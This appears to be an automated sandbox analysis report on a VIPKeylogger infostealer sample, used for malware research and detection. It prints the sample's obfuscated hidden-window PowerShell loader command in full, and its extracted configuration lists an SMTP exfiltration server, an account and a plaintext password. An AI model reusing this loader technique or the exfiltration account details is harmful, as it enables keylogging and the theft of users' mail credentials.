Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 01:36
Static task
static1
Behavioral task
behavioral1
Sample
9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Melibiose.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Melibiose.ps1
Resource
win10v2004-20241007-en
General
-
Target
9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe
-
Size
868KB
-
MD5
c676d09741d75516a52593da851f8e81
-
SHA1
d240a1271f4a3a0380a550d7c34bbfc5e2f3212b
-
SHA256
9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc
-
SHA512
1f032edb87bf2f7333e74e2ff997c07731974163d6e961261aee24b5e1ee6b00e3fe451c77e2983b509959d8ca86979b29796de133b1832c463894f46bae5b80
-
SSDEEP
12288:l9Aw7LtaVYyyQiZ5Q20zMETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0ma2:/AmtaVYyyQijQ9g+alCJmvulW6Nd0v2
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
Escaragol?24 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2028 powershell.exe 2252 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
msiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 16 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 20 648 msiexec.exe 21 808 msiexec.exe 23 808 msiexec.exe 24 648 msiexec.exe 27 648 msiexec.exe 28 808 msiexec.exe 31 808 msiexec.exe 32 648 msiexec.exe 34 808 msiexec.exe 35 648 msiexec.exe 48 808 msiexec.exe 50 808 msiexec.exe 54 808 msiexec.exe 55 648 msiexec.exe 58 648 msiexec.exe 64 648 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 47 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 808 msiexec.exe 648 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 2252 powershell.exe 2028 powershell.exe 648 msiexec.exe 808 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exepowershell.exepowershell.exemsiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 2028 powershell.exe 2028 powershell.exe 2252 powershell.exe 2252 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 2028 powershell.exe 2252 powershell.exe 2252 powershell.exe 2252 powershell.exe 2252 powershell.exe 2252 powershell.exe 2252 powershell.exe 2028 powershell.exe 808 msiexec.exe 648 msiexec.exe 808 msiexec.exe 648 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 2252 powershell.exe 2028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exedescription pid process Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeIncreaseQuotaPrivilege 2028 powershell.exe Token: SeSecurityPrivilege 2028 powershell.exe Token: SeTakeOwnershipPrivilege 2028 powershell.exe Token: SeLoadDriverPrivilege 2028 powershell.exe Token: SeSystemProfilePrivilege 2028 powershell.exe Token: SeSystemtimePrivilege 2028 powershell.exe Token: SeProfSingleProcessPrivilege 2028 powershell.exe Token: SeIncBasePriorityPrivilege 2028 powershell.exe Token: SeCreatePagefilePrivilege 2028 powershell.exe Token: SeBackupPrivilege 2028 powershell.exe Token: SeRestorePrivilege 2028 powershell.exe Token: SeShutdownPrivilege 2028 powershell.exe Token: SeDebugPrivilege 2028 powershell.exe Token: SeSystemEnvironmentPrivilege 2028 powershell.exe Token: SeRemoteShutdownPrivilege 2028 powershell.exe Token: SeUndockPrivilege 2028 powershell.exe Token: SeManageVolumePrivilege 2028 powershell.exe Token: 33 2028 powershell.exe Token: 34 2028 powershell.exe Token: 35 2028 powershell.exe Token: 36 2028 powershell.exe Token: SeIncreaseQuotaPrivilege 2252 powershell.exe Token: SeSecurityPrivilege 2252 powershell.exe Token: SeTakeOwnershipPrivilege 2252 powershell.exe Token: SeLoadDriverPrivilege 2252 powershell.exe Token: SeSystemProfilePrivilege 2252 powershell.exe Token: SeSystemtimePrivilege 2252 powershell.exe Token: SeProfSingleProcessPrivilege 2252 powershell.exe Token: SeIncBasePriorityPrivilege 2252 powershell.exe Token: SeCreatePagefilePrivilege 2252 powershell.exe Token: SeBackupPrivilege 2252 powershell.exe Token: SeRestorePrivilege 2252 powershell.exe Token: SeShutdownPrivilege 2252 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeSystemEnvironmentPrivilege 2252 powershell.exe Token: SeRemoteShutdownPrivilege 2252 powershell.exe Token: SeUndockPrivilege 2252 powershell.exe Token: SeManageVolumePrivilege 2252 powershell.exe Token: 33 2252 powershell.exe Token: 34 2252 powershell.exe Token: 35 2252 powershell.exe Token: 36 2252 powershell.exe Token: SeDebugPrivilege 808 msiexec.exe Token: SeDebugPrivilege 648 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exepowershell.exepowershell.exedescription pid process target process PID 4560 wrote to memory of 2028 4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe powershell.exe PID 4560 wrote to memory of 2028 4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe powershell.exe PID 4560 wrote to memory of 2028 4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe powershell.exe PID 4560 wrote to memory of 2252 4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe powershell.exe PID 4560 wrote to memory of 2252 4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe powershell.exe PID 4560 wrote to memory of 2252 4560 9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe powershell.exe PID 2252 wrote to memory of 648 2252 powershell.exe msiexec.exe PID 2252 wrote to memory of 648 2252 powershell.exe msiexec.exe PID 2252 wrote to memory of 648 2252 powershell.exe msiexec.exe PID 2252 wrote to memory of 648 2252 powershell.exe msiexec.exe PID 2028 wrote to memory of 808 2028 powershell.exe msiexec.exe PID 2028 wrote to memory of 808 2028 powershell.exe msiexec.exe PID 2028 wrote to memory of 808 2028 powershell.exe msiexec.exe PID 2028 wrote to memory of 808 2028 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe"C:\Users\Admin\AppData\Local\Temp\9b1f6b694a8757b419c04ccd6ade02b58db56952b45d3a70c02dfb9682ec9fdc.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Bittermandler=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Melibiose.Spa';$Datarepraesentation=$Bittermandler.SubString(54249,3);.$Datarepraesentation($Bittermandler)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Bittermandler=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Melibiose.Spa';$Datarepraesentation=$Bittermandler.SubString(54249,3);.$Datarepraesentation($Bittermandler)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:648
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD576b2de4276a82861ed2fc9622aca4532
SHA1121d53d4ccd29ff917c424c703a718f4ce811172
SHA256a5d281814ab7745a410c2de4e66244f253662f3c78fdc0d2a280632afab807e4
SHA512de2758ac45fd6d48008c9ad0f58e71d064e6284f8665cd09794f9d1a6d6c2747ed7c9be6f6a784c530b72290c0de015849e9a650e2ddd7172dda1dba79562605
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5ed2bc277627fe9729bb6e14fc0ca8651
SHA145904821d33b90391b60e1c78283343b40167f79
SHA2567d3aa148aa339df14b24d65c7ec460b0bec9067dee838ef9a48a1028e393a99b
SHA512e02dd1357820ef6824580e5d9277ffcaa8540f936ae076de3dca4a61c2ab4ad0b4d1b024a171473bbd65bd8a9cf27f46167f3f38be04d56280b7348abe23440a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5452e11716ea4843afe2f66561e31bed5
SHA136e2c61b5ead22352683945567e75f3bfbfc6b3c
SHA2569daa8523616103e9dd1f7ba52b95b16fcf1b6935d43488db6abf5467dceab917
SHA512b9089c671248e5a4b47742756da9837ae49da54a9cd3072624266adaaf69bcc32dabde6fcd1b7529ec6fefa3b127ec745ce425f3de22bc3cff1b922be8075d89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5c1e3d1e6bf1268828b50bbe9fef28e40
SHA18499aac8e1863b89548d64e2b52afec3c59863f8
SHA2562eafb4445917a6c3e4f0dda54480d0a7930920ed2da3f1009bac688eadff034d
SHA5120b1cb3484df05e905a3c41b9cb5d0cf9634738fbde30bcd7fb75e67c52ca6f05d8932e8a88daad6daf36d665202613c087127850f3de8ac8d35dff031c43efdd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD514d35798f0d6367079bb70e42cea7da4
SHA1cab3992e5d376f353cca68ff1565b2322b592a40
SHA2568df5069df50f04cbecacc7e9c1f40e40af12d767c428521f45ad6ce89a07062d
SHA512f7cd1e5f77162d26359b20361c3a2d6e0be1d8876910077aceac5559644cc4b912be8540afa47d031fea87617c5305881cc6fb235bb61b52f8bd34660cbc1dbb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5740ad5a3443b1ce34ca4927788d72703
SHA12bdf9fba52c02efeaeaab7ae9767a8499d71c09f
SHA25633ea7a3854f76ff3e8eebeb4a5af6ea2753b4743b4c8892c0af2444bc10d19af
SHA51286ec8f387e5a4e5a52024b100d5bdb1df82702c834943031f0bf6c68f506c7d01b3f5fecfc9aefd5b6af0ed281a7fc57c5865cd002bee6419295643b26316b14
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD526c82aee502b3a7984d8f6d3d3b992e7
SHA1031c2817004be0111797f49ad71aefdca66c3e43
SHA25676ccd8933a01e69ac7a70120161a638392c8ce6ffa8fd0cfa90e67dfd89d3829
SHA512db4b68d450641386888a7c278ac25029b14a25c142b8c137736a85cb90fc245688e68ad1299c7a6226e551d91eacf2284b4b2e11dbd03e026d44275b410e3204
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
53KB
MD51f737850c90e5d135b2a519df3ce86a4
SHA13d539ea4291810b1191eb671d8369b0cfa6d6f1d
SHA256dbc22a96f5153282b6037375b64d01887dbf9b978dd5eada76eaba847d8e7a3f
SHA512677a27533f8505de074c2237fba524f250c6db2c5a02b9b89341a49cd49ea6ccca1126d5964de025414fcf2fac58aee798f2c5c1536ab80a8ada088f1fd85996
-
Filesize
333KB
MD56c43ff6c8e656140c1dca9e969d7be44
SHA1a834f6adece9367dd3926f2136a72bb29b54072d
SHA256fe0ca437fd89e26cd99d3400ecf4af7f2f8de208d9e9ffec674add59a147b471
SHA512f749284ff814901c56cd4c69ec33635cf93bb2582fb43f90b9c3030581de50826af88a4d2b4c063e631a0964c810ec6c70728206a1c6195d225dee5921fccf21